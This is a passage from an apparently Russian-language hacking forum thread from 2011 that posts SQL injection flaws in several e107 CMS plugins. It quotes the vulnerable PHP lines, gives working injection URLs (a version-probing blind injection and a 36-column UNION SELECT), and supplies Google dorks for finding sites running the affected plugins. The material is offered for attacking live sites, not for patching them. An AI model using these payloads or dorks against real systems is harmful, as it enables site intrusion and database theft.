[/COLOR][COLOR="#0000BB"]$team_description[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'team_description'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]$z[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'players'[/COLOR][COLOR="#007700"]]=[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db_Select[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"lique_roster"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"*"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"roster_team_id="[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$team[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"]);
while([/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db_Fetch[/COLOR][COLOR="#007700"]()){
[/COLOR][COLOR="#0000BB"]$z[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'players'[/COLOR][COLOR="#007700"]]++;
}
...
[/COLOR][/COLOR]
Пример:
Код:
Code:
http://e107/e107_plugins/lique/strafen.php?team=1%20and%20substring%28@@version,1,1%29=5
И много ещё чего бажного...
Дорк:inurl:e107_plugins/lique/
|
|
|
|
06.01.2011, 23:55
|
|
Guest
Сообщений: n/a
Провел на форуме:
34733
Репутация:
83
|
|
AACGC MOH Stats V1.0
SQL injection:
/Member_Details.php
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]...
if ([/COLOR][COLOR="#0000BB"]e_QUERY[/COLOR][COLOR="#007700"]) {
[/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]explode[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'.'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]e_QUERY[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$action[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]$sub_action[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]2[/COLOR][COLOR="#007700"]];
unset([/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"]);
}
...
[/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db_Select[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"user_extended"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"*"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"WHERE user_extended_id=[/COLOR][COLOR="#0000BB"]$sub_action[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db_Fetch[/COLOR][COLOR="#007700"]();
[/COLOR][COLOR="#0000BB"]$sql2[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db_Select[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"user"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"*"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"WHERE user_id='"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'user_extended_id'[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]"'"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"]);
...
[/COLOR][/COLOR]
Пример:
Код:
Code:
http://e107/e107_plugins/aacgc_mohstats/Member_Details.php?det.2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36--
Дорк:inurl:e107_plugins/aacgc_mohstats/
|
|
|
|
07.01.2011, 20:48
|
|
Guest
Сообщений: n/a
Провел на форуме:
34733
Репутация:
83
|
|
Userclass Images v09 Beta
Необходимы права администратора, SQL injection:
/admin.php
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]...
[/COLOR][COLOR="#0000BB"]$q[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"SELECT * FROM "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]MPREFIX[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"userclass_images WHERE userclass_id='[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]uid[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#DD0000"]'"[/COLOR][COLOR="#007700"];
...
[/COLOR][/COLOR]
|
|
|
|
07.01.2011, 21:06
|
|
Guest
Сообщений: n/a
Провел на форуме:
34733
Репутация:
83
|
|
EveryPage v1.0
Необходимы права администратора, SQL injection:
/admin_config.php
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]...
[/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"ep_text='"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'code'[/COLOR][COLOR="#007700"]] .[/COLOR][COLOR="#DD0000"]"' WHERE ep_id='"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'id'[/COLOR][COLOR="#007700"]] .[/COLOR][COLOR="#DD0000"]"'"[/COLOR][COLOR="#007700"];
...
[/COLOR][/COLOR]
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
